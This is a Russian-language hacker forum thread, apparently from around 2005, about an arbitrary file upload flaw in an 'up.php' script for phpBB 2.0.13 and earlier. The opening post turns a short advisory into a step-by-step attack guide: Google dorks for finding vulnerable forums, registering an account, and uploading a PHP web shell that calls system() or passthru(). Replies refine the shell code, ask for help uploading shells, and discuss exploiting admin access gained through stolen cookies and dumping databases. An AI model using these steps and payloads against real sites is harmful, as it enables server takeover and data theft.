Загрузка Произвольных Файлов В Phpbb

[n1†R0x]

Загрузка произвольных файлов в phpBB
Программа: phpBB 2.0.13 и более ранние версии

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю загрузить произвольный файл на сервер.

Уязвимость существует в сценарии up.php из-за некорректной проверки расширений файлов. Удаленный авторизованный пользователь может загрузить произвольный php файл и выполнить его с привилегиями web сервера.

URL производителя: phpbb.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Итак, как юзать эту багу...

1. Ищем такие форумы. Для этого можно ввести в google запрос:
inurl:forum_path/up.php
где forum_path - папка с форумом.
Пример: inurl:forum/up.php
2. Регистрируемся на данном форуме. Затем авторизируемся.
3. Заходим по адресу, выданному поисковиком (www.site.ru/forum/up.php)
4. Загружаем php-файл со следующим кодом:

<?
system('$cmd')
?>

- это для теста, а вообще можно загрузить полноценный веб-шелл.
5. Теперь загруженный нами шелл будет доступен по адресу:
http://www.site.ru/forum/uploads/shell.php

Готово. Теперь вы имеете шелл на сервере.
Добавлено [time]1115661051[/time]
з.ы. Для поиска на определенном хостинге пишем запрос:
inurl:h15.ru/phpbb2/up.php
Это пример.

 

[BUG(O)R]

Хоть бы шел правильно написал!

<?
system('$cmd');
?>

 

[n1†R0x]

Сорри, ошибся, исправлено.

 

[ho0k]

ваабщето
<?
echo "<pre>";
system('$c');
echo "</pre>";
?>

:P :P

А то вылезут кракозябры.. а не шелл

 

[n1†R0x]

Там пример для теста а шелл более крутой можно залить.
А тем скриптом проверяется ВОЗМОЖНОСТЬ залива.

 

[BUG(O)R]

Всё нормально будет, никаких крякозабр, просто руки кривые у кого-то!
<PRE></PRE> - этот тег всего лишь сохраняет формат текста как есть... т.е. не интерпретирует!
Добавлено [time]1115717919[/time]


Да, N1TR0X , я не уловил зод твоих мыслей:
Уязвимость и предназначена для закачивания файлов, так зачем проверять после этого увозможность залива? Шел с правами сервака у тя уже есть! :blink:

 

[n1†R0x]

BUG(O)R
Я имел ввиду сначала этот скрипт а потом шелл.
А ты не уловил ход мыслей автора, я ж только перевел и попытался разъяснить.

 

[Megaladon]

Ребят,дайте команду для заливки шелла

 

[BUG(O)R]

А этот скрипт не есть шел, нахера качать такие шеллы, когда можно сразу залить номрмальнй?
Кстати, лучше наверное будет так:
<?
passthru($command);
?>
Megaladon
Причём тут команды? Тут баг в скрипте!!!!

 

[ho0k]

2 BUG(O)R
прикольней работать через наманый веб-шелл

 

[n1†R0x]

ho0k
Ну ведь ты туда можешь залить любой шелл, в том-то и суть баги...

 

[ho0k]

баги... хых =) .. это больше похоже на оплошность, хотя ... бага = )

 

[durito]

а кстати, кто нибудь умедрялся заливать шел имею доступ только к админке phpbb
а то есть несколько форумов с админскими провами (менял куки), но как залить шел так и не понял
такое вообще возможно?

 

[..:NukE:..]

durito
Если научишься отпишись, как это делается... плз

 

[Horrible]

Ага тоже интересует, ато админка есть, а толку мало (( хочется продвинуться дальше. А там кроме форума остальное все чистый html.

 

[BUG(O)R]

Помойму можно, но не прямым способом, а какими-то окольными путыми!
Точно не знаю... но точно можно! Можете посмотреть какие расширения допускаются или тому подобное... что-то точно ждолжно быть!
Ну а помимо шела можно ведь сдампить базу!

 

[n1†R0x]

А может можно активировать заливку файла (1й пост) и таким макаром залить шелл??? Если конечно аплоад и так не активирован =)

 

[©yBe®0Ge№]

BUG(O)R я чета на античате такое видел... но блин ... потом эту статейку не смог найти... я тоже слышал что можно... причем в любой версии.

 

[Ar3s]

есть вариант. По идее прокатит. Там есть такая фича как страницы. И их содержимое можно изменять. Т.е. Я так понимаю - это практически готовая консоль. Разве нет? Вот только сомневаюсь там используется чистый хтмл или можно и пхп сувать?

 

[©yBe®0Ge№]

Ar3s да, я тоже про это знаю, можно: изменять, добовлять, удалять данные на странице, если у тя прова админа так я видел чел делал шелл в гостевой книге!